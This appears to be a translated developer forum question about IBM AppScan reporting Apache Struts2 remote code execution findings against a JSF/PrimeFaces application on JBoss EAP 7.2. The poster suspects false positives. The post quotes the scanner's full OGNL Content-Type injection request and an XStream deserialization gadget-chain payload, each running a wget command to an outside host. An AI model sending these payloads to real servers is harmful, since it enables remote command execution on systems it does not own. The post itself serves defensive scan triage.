jboss7.x - 在 JSF 2.2 和 Primefaces - JBOSS 7.2 EAP 上报告的 IBM AppScan Struts2 问题

问题描述

我们最近收到了来自 IBM AppScan DAST 的结果，其中一些结果没有意义。第一个 2 High 问题显示应用程序是 Struts2，这是不正确的，因为它是在 JBOSS EASP 7.2（JSF 版本 2.3）上运行的 JSF 2.2、Primefaces 7.0.9。我什至没有在 JBOSS 模块/罐子中看到 Struts。

1.High——Apache Struts2远程代码执行

风险：可以在 Web 服务器上运行远程命令。这通常意味着服务器及其内容的完全妥协修复：升级到最新版本的 Apache Struts

GET /**/main.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: %{(#_='multipart/formdata').(#
dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#conta
iner=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstanc
e(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#o
gnlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget
http://**:**/AppScanMsg.html?varId=5899').(#iswin=(@java.lang.System@getProperty('o
s.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#c
md})).(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.
apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUt
ils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

似乎响应是 HTTP/1.1 200 OK，AppScan 认为这是一个漏洞

我们被告知我们应该检查请求标头的 Content-Type。在过去的任何 DSAT 中，我都没有遇到过这样的情况。以前有没有人在 JSF 中做过类似的事情？

1.High -- Apache Struts2 REST Plugin XStream 远程代码执行

POST /**/javax.faces.resource/charts/charts.css.xhtml?ln=primefaces&v=7.0.9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/xml
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value
class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource
class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is
class="javax.crypto.CipherInputStream"><cipher
class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator
class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter
class="java.util.Collections$EmptyIterator" /><next
class="java.lang.ProcessBuilder"><command><string>cmd.exe</string><string>/C</string><string>"wget
http://***:**/AppScanMsg.html?varId=6107"</string></command><redirectErrorStream>fal
se</redirectErrorStream></next></iter><filter
class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>
start</name><parameter-types /></method><name>foo</name></filter><next
class="string">foo</next></serviceIterator><lock /></cipher><input
class="java.lang.ProcessBuilder$NullInputStream" /><ibuffer
/><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>fal
se</consumed></dataSource><transferFlavors
/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nasho
rn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"
/></entry><entry><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString"
/><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString" /></entry></map>

似乎响应是 HTTP/1.1 200 OK，AppScan 认为这是一个漏洞

我们的 web.xml 定义了错误页面，客户端状态保存

<error-page>
        <error-code>404</error-code>
        <location>/error/404.xhtml</location>
    </error-page>
    <error-page>
        <error-code>500</error-code>
        <exception-type>java.lang.RuntimeException</exception-type>
        <location>/error/access.xhtml</location>
    </error-page>
    <error-page>
        <location>/error/error.xhtml</location>
    </error-page>

    <context-param>
        <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
        <param-value>client</param-value>
    </context-param>

有人从 DSAT 看到过类似的问题吗？其中一些可能是误报吗？寻找反馈和一些见解。

其他问题

• IBM AppScan - 盲 SQL 注入（基于时间） - JSF 2.2 和 Primefaces - JBOSS 7.2 EAP
• IBM AppScan - Java 反序列化代码执行 - JSF 2.2 和 Primefaces - JBOSS 7.2 EAP
• IBM AppScan - 端口侦听器命令注入 - JSF 2.2 和 Primefaces - JBOSS 7.2 EAP
• 通过“Referer”标头防止跨站点请求伪造

链接 JSF 中的 CSRF、XSS 和 SQL 注入攻击预防

标签： jboss7.xjsf-2.2